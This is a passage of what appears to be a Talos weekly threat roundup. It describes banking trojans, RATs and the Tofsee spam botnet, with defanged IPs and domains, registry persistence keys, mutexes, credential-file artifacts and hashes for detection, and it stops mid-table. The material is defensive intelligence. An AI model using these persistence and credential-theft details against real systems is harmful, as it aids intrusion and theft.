Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 9 and July 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat NameTypeDescription
Win.Packed.Zusy-9878432-0 Packed Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Packed.Dridex-9876874-1 Packed Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Win.Trojan.Razy-9877507-0 Trojan Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Trojan.Zbot-9876743-0 Trojan Zbot, also known as Zeus, is a trojan that steals information such as banking credentials using methods including key-logging and form-grabbing.
Win.Dropper.Tofsee-9877384-0 Dropper Tofsee is multi-purpose malware that features multiple modules to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Malware.TinyBanker-9877962-1 Malware TinyBanker, also known as Zusy or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Virus.Xpiro-9877934-1 Virus Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Trojan.DarkComet-9876875-1 Trojan DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
Win.Trojan.Hupigon-9876962-0 Trojan Hupigon is a trojan that installs itself as a backdoor on a victim's machine.

Threat Breakdown

Win.Packed.Zusy-9878432-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 11 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\ACTIVEMOVIE 7
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\ACTIVEMOVIE\DEVENUM 64-BIT 7
<HKU>\.DEFAULT\SOFTWARE\MICROSOFT\ACTIVEMOVIE\DEVENUM 64-BIT
Value Name: Version
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{1DR57FKR-8LH5-APDI-WL15-D7E36D092O6R} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{0JM26DTV-2IP2-VVKK-WQ72-M5P76R119V7P} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{3IM35UGV-5AZ2-MYEB-TR30-E5J75Y142M0Z} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5BI26ZPE-2CT2-LOXC-YG96-J1B76T524D3T} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C} 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5BI26ZPE-2CT2-LOXC-YG96-J1B76T524D3T}
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{1DR57FKR-8LH5-APDI-WL15-D7E36D092O6R}
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{3IM35UGV-5AZ2-MYEB-TR30-E5J75Y142M0Z}
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\650478DC7424C37C 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\7289246C77593EBF 7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\650478DC7424C37C
Value Name: 2
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\7289246C77593EBF
Value Name: 2
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{0JM26DTV-2IP2-VVKK-WQ72-M5P76R119V7P}
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\650478DC7424C37C
Value Name: 1
7
<HKLM>\SOFTWARE\CLASSES\CLSID\{5GJ77YIY-7TC3-SAVH-ZT03-P8U07A424A6C}\7289246C77593EBF
Value Name: 1
7
MutexesOccurrences
eed3bd3a-a1ad-4e99-987b-d7cb3fcfa7f0 - S-1-5-18 7
Global\a0e6fb61-e468-11eb-b5f8-00501e3ae7b6 1
Global\a2051d61-e468-11eb-b5f8-00501e3ae7b6 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
208[.]95[.]112[.]1 7
104[.]21[.]21[.]221 7
34[.]97[.]69[.]225 7
172[.]67[.]200[.]215 4
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ip-api[.]com 7
iw[.]gamegame[.]info 7
ol[.]gamegame[.]info 7
google[.]vrthcobj[.]com 7
Files and or directories createdOccurrences
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cookies.sqlite.tmp 7
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cookies.sqlite.tmp-shm 7
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\cookies.sqlite.tmp-wal 7
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cookies.tmp 7
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data.tmp 7
%TEMP%\axhub.dat 7
%TEMP%\axhub.dll 7
%TEMP%\api-ms-win-core-namedpipe-l1-1-0.dll 7
%TEMP%\api-ms-win-core-string-l1-1-0.dll 7
%TEMP%\ 1
%TEMP%\ 1

File Hashes

01c89872ebd48f97e9161564183cea49dfb69cc90b693068729894eddd066561
4420e1edcb7735245bd485c772a2c388c1d85ba801b9373b89307977abae7a0d
64193e3cd582e158d2533a6c7fd115b1b76d521e44f42aaa545375601fcbcfc0
673453fec6e11175bf0a749c94594c22a886d2f287e9648b51aa305b17109ffd
7010d5ddded81107f17f04b164bdcf1d3f9cd3e84745f711ad5178356c13bff7
90a1aa811661bf8575c63069aa52f5ab6b691307a78a43668caad53d7cfa74af
948bd9774b0dfad1762f459a078f55426780b722585aa701941e95b188a552de
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c
a0836b3ace14b2e4ea8dde7270076bc2c9370c8c4be97258d5aa8c9bdf6b7b4a
b5836dfd74e9e193cb8b3ee99d34f6b93ff5b88fecdc8f0b55928407bd0af376
b92a71d8ea301e1d28e35cfe737783942348a27614fbdf288e489e0a573d384b

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Packed.Dridex-9876874-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry KeysOccurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: trkcore
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
Value Name: CheckSetting
26
MutexesOccurrences
<random, matching [A-Z0-9]{10}> 26
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_sr.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_2560.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide_alternate.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:iconcache_idx.db!rwReaderRefs 1
\Sessions\2\BaseNamedObjects\FileZilla3DragDropExtMutex 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_wide.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_48.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!ThumbnailCacheInit 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_256.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_96.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwWriterMutex 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_custom_stream.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_exif.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_idx.db!rwReaderRefs 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1920.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_32.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_1280.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_16.db!dfMaintainer 1
\Sessions\2\BaseNamedObjects\Global\C::Users:Administrator:AppData:Local:Microsoft:Windows:Explorer:thumbcache_768.db!dfMaintainer 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
172[.]217[.]12[.]142 19
104[.]23[.]98[.]190 16
104[.]23[.]99[.]190 10
172[.]217[.]197[.]138/31 7
23[.]3[.]13[.]153 6
72[.]21[.]81[.]240 5
172[.]217[.]197[.]102 5
172[.]217[.]197[.]100/31 5
172[.]217[.]197[.]113 4
23[.]3[.]13[.]154 3
142[.]250[.]73[.]238 2
172[.]217[.]10[.]110 1
172[.]217[.]11[.]46 1
172[.]217[.]165[.]142 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
pastebin[.]com 26
w[.]google[.]com 26
www3[.]l[.]google[.]com 21
cs11[.]wpc[.]v0cdn[.]net 5
www[.]kvngsfgvwj[.]com 1
www[.]k84fhimmv0[.]com 1
www[.]rpglh3jpai[.]com 1
www[.]zkyrdwtrmd[.]com 1
www[.]oln18ksf8x[.]com 1
www[.]bdysup3xgi[.]com 1
www[.]mdz3krbob8[.]com 1
www[.]gmijo75cvt[.]com 1
www[.]avuuk3rnjf[.]com 1
www[.]keh6wi3alz[.]com 1
www[.]icmderuwdg[.]com 1
www[.]rjqkbe6dlg[.]com 1
www[.]k3g9hw3wmc[.]com 1
www[.]q6mrjuq0xp[.]com 1
www[.]o493fqbd2a[.]com 1
www[.]tlf4u71kzi[.]com 1
www[.]venjhmoxel[.]com 1
www[.]kunx1klqyn[.]com 1
www[.]a2lewtz3n4[.]com 1
www[.]1jdy1tyj8q[.]com 1
www[.]ty96upgczj[.]com 1

*See JSON for more IOCs

Files and or directories createdOccurrences
<malware cwd>\old_<malware exe name> (copy) 25
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\LockScreen___1024_0768_notdimmed.jpg (copy) 1
%ProgramData%\Microsoft\Windows\SystemData\S-1-5-18\ReadOnly\LockScreen_Z\~ockScreen___1024_0768_notdimmed.tmp 1
%LOCALAPPDATA%\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl 1

File Hashes

078406d44ef482ba783e43ae60d178c1290ab9f75aed94a030ebb385e0fcd542
0b66572085393ee6af16e7df9b186415a47798a3972e76a1c7381f771638619a
0e382a306092704f68baacc64070625f428cbc66e6fa8d6b977cb7c1349d33b0
102eafc10cc6fee745b4e9017bace176ab3199a73088c01ddd422da0a4f3497c
1201e536f2f9b5fe11d7a57001a3e017fa9aace0bcd26bdae0fc532a7df2af13
177095f963c94c12fa9dcabe2956abbde29cfa306b0d54d9aa93d6f6fd2bd875
1c7c67cb4b666017377047ca1832e54aa0e0a0c08df2e6f420e76893fb7a830b
21da2556cb79aea985e54cffc63c930918ba4c48f719c16f1b200c1fd1bff4c0
2254292352b50065492bc7a31262bdd66c1783095bb4e50188327a5499c7746d
225ded2215279db7c823cbd396c12ae3ccf94b264dea53fa418ee3ac7b0f41c6
2d1c1688ad9b3a3212ad20040a0c1c0486119b35c9e70acfcbac136e33959d61
31220ef8cd911cabc7d08ed3e07c22a5496b481b541dde73a7a77fae4779dfcf
35c818a789dc0fc9789ab4ef2e508e918b3210c5bb50c1ff29910dfe1b11fce8
3dea72530f5f0769a478ca2718a1c5b2d9ec0a7f7e3f8a22d359867c71880d31
3e2a1366d69e1a8da15ade80ad42a1a188a9775fed8e6b7ecd3efcb9e4bf2765
484b5ca3196a152c85ef281e567f04b0d379ad12566d71b95d0b63eed4cfdf45
531bc34f4d9aec9491feb02697fc8c825bc8aaa0257460c6f8f515c7b034b753
59d6f7d5395eee53f0d51d80658f9233de8376405917882bd8e4be984b43135c
5a82fa5ad3e7673a3694ff95f5e6971ea2055342598cbdb39bfe2b689d51281d
5b8cf64e9a8f50a6d513548edd6a3e4c611172cafae869f4f34100fab1194869
5bb379d0adee29649d0832131897b59a251bc2fff9b1aec9d532ceff8ad22fd4
5c435115abd836cbc28badaa47717f62b717459ede7fca9ffc51adda9d803708
5c8060bbcf3387af85df9725b3f4737a330133128f1978e8165b8ac64012a55f
5d810129ff3aa63203b5ad06f3a1413be34894e252ada8b84bb346c28b1a8bf2
5e4e3d3e83ac21735d9eab1007ea7edfc144919058efcb8951116403614c8344

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Razy-9877507-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry KeysOccurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\\SHELL 1
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\\SHELL
Value Name: KnownFolderDerivedFolderType
1
MutexesOccurrences
4pC39Ev2yuzFY8izw76DGDJR 26
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
185[.]10[.]68[.]220 10
91[.]211[.]89[.]29 9
185[.]10[.]68[.]123 8
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
eu[.]minerpool[.]pw 26

File Hashes

095decd5f40c368b2190287a0a0d97b06f8e76c306ce45a8b2f1ac3daf1c1233
167ef9366f5049a74cb92a0abbd36a4953cc8674d58197d47f7339cb0dfa4e11
2338bbafa9846231097abc8e2b1c3db83a5e88919221f7aff80366edf2d7925c
261c22deeb0a19e4cd24396585cf617a84596bbbbf66d30c18f09cb415995207
3ab581da498f04e47e33f51c5d9270d478f40bb44236de9229a58201ad10d606
3c3483c8cf352d42b1c7e5a9d6b655a4bef43b212e5e3a0b45fa9b307d502d84
40b61a456a73bfbf6d690ee89d2b62af843f62323d6777294876f8ac5962d652
6aed58a1045a78ccdcc5ee145e056154b45a3c54d3c2cb056756a6e77c57e40e
7cdce9fcd50ace7078188125f4c8716648c587b389156e8394be684e24a10d8f
81af0ec0506000b94f628118349a45fa8fce67ec2c665dd1d4f1f6816efb2070
8fd0639bc376171d348d95b9e3ddf409e16ed220c20871b018f4486cab69236a
9245b2d9ce1ef6396ee1a73dacfbd8688d373f71ec35c048500b916a343119ce
9752c1da9c05d90053fa554cde62f3068d25108243df093fe27c8682969c5821
97999d9450a48c13949af961b01df265b1397acbfcd121c9767e8e51b713d6d1
9b91db40fdea8142abe8e3b4a434027e124f3220421e47804d2ec77ee2425dbb
a3a88cf7487b72c07f9bf49f455ecdb63c94fcbbbab4ea52610eb3413af9180e
aeedd020d314a41816fa7dca8ebb78ce37eb24e7cbc0a62eb3f12c032f7cfe54
b35da7d259c49070f4bd6718639654b10cd1e205ef47e8df1f1df0b6b22784ee
d919540585fd8b0e92644f2faca2dfc39bc87579bfeeadcae22e5ee1b083bff5
da3310b8d81a48a868cf6cf617a0085b7800023a3ef1d7199ee43d3182de7706
db0f790456209644b8e1d1970f562458dada3735a143d6232a5202f1357c724f
e067ff5ff99b8b5b09094e95442e074b03054b1ed45833e243e10f53f4a6223b
eaf3bf00159e7baf0cd278f9d2d2e87f0c0e5e5d1be99f2d4116fcf8dc73dbb2
eb764038299d8cab628cfe1898a630aaeac3198f946a4cc01549862110961bb3
eba64f0990023b2d9acffdecd701e787321040dfe5d4880c29916a39ed45fc5e

*See JSON for more IOCs

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Trojan.Zbot-9876743-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 22 samples
Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 22
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Adobe
4
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Wow6432Node
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: ODBC
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Mozilla
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Macromedia
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: JavaSoft
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Microsoft
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Classes
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: AppDataLow
1
MutexesOccurrences
88DBA0C4E2AF76447DF43D1E31331A3DDFD6B146 22
2B9A8C67DC1B4C75448E49FE312F9FA854FD1102 1
E3760AA3B91957B7BE56AB5AC8AFF95554FD1102 1
5648521BBE38B9788AB349E9232C1AB654FD1102 1
2A705A1862097DD390FDA2FBE22F00567AC7CB39 1
3B6F290A1D83B4CB9B3A36F3D63FAE8B47169355 1
A3CCEECBA73C117B92C4877B844CC3974D6D40C8 1
0164C866F1068DCFF562B6EA0CB17A48535C69CB 1
11D01601084BA8AB2A92ABD619F391D557019107 1
C9E9340333EA7181CFEB4456FAFB69814606317A 1
201E8A97DDFB1D5AD324645228B94C3924F9E955 1
71F44DF32E1155895791B8E6BA7D7C067C48096D 1
ABCF10EB30ED5E962F5F28C6947B55F01B3157F6 1
D8C7D9B0550FF5896AEA9BBADB3D321D10AADC52 1
ABCF10EB30ED5E962F5F28C6947B55F02F60953F 1
E3760AA3B91957B7BE56AB5AC8AFF9557015B7D3 1
32231A5A07A67564ECECF990FF4314D57205F37E 1
C88FE2FDBDA7F4FD2943E95836BD26AD6A669145 1
8AE738634DC65D6F98BC08191C57D05F5758B3FA 1
C9E9340333EA7181CFEB4456FAFB698142476F9F 1
524B500CCA29D0C6B2B9C487658AA84E4934B9F9 1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
52[.]185[.]71[.]28 13
52[.]137[.]90[.]34 11
65[.]55[.]50[.]189 1
134[.]170[.]58[.]222 1
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
windowsupdate[.]microsoft[.]com 16
redir[.]update[.]microsoft[.]com[.]nsatc[.]net 13
www[.]update[.]microsoft[.]com[.]nsatc[.]net 3
f58dfc22[.]mjhk-wjty[.]info 1
bd5a7c4b[.]mjhk-wjty[.]info 1
57360501[.]bthmj-nty[.]info 1
8cbeafbf[.]bthmj-nty[.]info 1
8d0dc390[.]bthmj-nty[.]info 1
19df0b48[.]bthmj-nty[.]info 1
8b4c429b[.]bthmj-nty[.]info 1
7e22d9dd[.]mjhk-wjty[.]info 1
bf1c3bad[.]mjhk-wjty[.]info 1
3c6b6823[.]mjhk-wjty[.]info 1
9c6b34a9[.]mjhk-wjty[.]info 1
7e4069b8[.]bthmj-nty[.]info 1
347d9155[.]mjhk-wjty[.]info 1
3277f004[.]mjhk-wjty[.]info 1
61659270[.]mjhk-wjty[.]info 1
f5959882[.]bthmj-nty[.]info 1
547b501f[.]mjhk-wjty[.]info 1
66a1afcf[.]mjhk-wjty[.]info 1
b26d6ace[.]mjhk-wjty[.]info 1
545f31f8[.]mjhk-wjty[.]info 1
5bb71283[.]bthmj-nty[.]info 1
3a87509f[.]mjhk-wjty[.]info 1

*See JSON for more IOCs

Files and or directories createdOccurrences
%APPDATA%\D6B146.exe 22
%APPDATA%\<random, matching [A-Fa-z0-9]{5,8}.exe 20

File Hashes

04c77f071b7494b1259297733f9275c4307406b7e46f06d530cbca3d2ab307c9
0cb495193ea4b0e65c509f03b55e5778abb1ea79d04f8f0b5458c46e1f2a1300
1086feb2585661695e32f7bb4b4805c999e909c29c15a49fb7ada2076b66ff00
25b3bcb3f14f6e0f4c1b77f16aa7851e17c842a8141787957abeea03232b74ea
25dbd3abc8fc51153deddd77f8cf459daaee58f1cd1f6e59678bd2c04862f632
38e2fbd03fc45e8e2de74f1f8f42a3624a6a1ef992bd80129508a18af2420ddf
3904cb4f2724ce6ab19e8370e2bceff8aa6a7290816db7af33376dbba0e149a9
50cf9e2b2d41c95ece1ab1816aa982e2f9985d50379606968cf6be6b1d7648e0
59235bb9c2f55758a723b1b5f972319290d6488839d03559b2f373400be7d584
75fbce4b4e66a327010571bdc92b6a2f741f7fe3bd60a9ba0b6f35ea741664d5
8a2ddcd2b2ca5e67a77ac912472b42f3635233f6ea307c271792cb254e29a4f8
967f9bbfebe739fc189f026533ce44197819f6aa782f9d54a59111e61ea2d8ff
ab6547333c7d6a67fd43c3ea8e697f1e7f94e1e25d597ea7d657f659e99df98e
b37f40912a3923dc94f0ed897257860b67ca43adf2fcc5e9b7ecd4798b7c18c4
b5c29d18bdbd35f46f779f138d47808c1db6b9090bc5dbe96e51f937be8144fc
b95ef9aeed7b2118b50b0b1ece272dc3724e2d12e89707c095781f56c7790a64
bf78fce8a360782f79125b6aa28ab75bc81e1f98bcc1c3e502008734c62bca63
cf332830e35d3c835ab9d6dffd8bc29326799d0e09b53a4270eb8922e9146329
cf593c851c53d297e846b034b5936c21f85a3baa30c15f19740addb42fed4ee5
d7e807cd9d6969ed044aabcde86e02166a6ab567a14543ede0a28c2a70261643
df8c14d7c068be16726575550483e2187545b97d2c129ad588d3e7cb814b957c
fb2e7c577767137e36bc8dfb935f847148a12a998b46665d083c4ccd9d9b87b8

Coverage

ProductProtection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK


Win.Dropper.Tofsee-9877384-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 273 samples
Registry KeysOccurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 271
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
267
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
75
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\zsgmltzo
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: ErrorControl
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: DisplayName
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: WOW64
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: ObjectName
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO
Value Name: Description
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\ZSGMLTZO 17
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Type
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: ErrorControl
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: DisplayName
15
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
43[.]231[.]4[.]6/31 270
176[.]111[.]174[.]19 269
95[.]216[.]206[.]250 269
162[.]244[.]34[.]228 267
176[.]111[.]174[.]126 267
176[.]9[.]102[.]196 267
136[.]243[.]18[.]158 267
176[.]111[.]174[.]124/31 267
172[.]217[.]165[.]132 216
31[.]13[.]65[.]174 210
65[.]9[.]146[.]69 123
40[.]93[.]207[.]0/31 104
142[.]250[.]72[.]115 90
31[.]13[.]65[.]52 79
40[.]76[.]4[.]15 61
216[.]239[.]36[.]126 57
40[.]112[.]72[.]205 54
40[.]113[.]200[.]201 53
211[.]231[.]108[.]46/31 53
104[.]47[.]53[.]36 52
104[.]215[.]148[.]63 51
163[.]172[.]32[.]74 49
40[.]93[.]212[.]0 44
23[.]64[.]110[.]75 43
99[.]181[.]79[.]1 40

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
microsoft-com[.]mail[.]protection[.]outlook[.]com 272
microsoft[.]com 272
lazystax[.]ru 272
249[.]5[.]55[.]69[.]in-addr[.]arpa 271
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 269
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 269
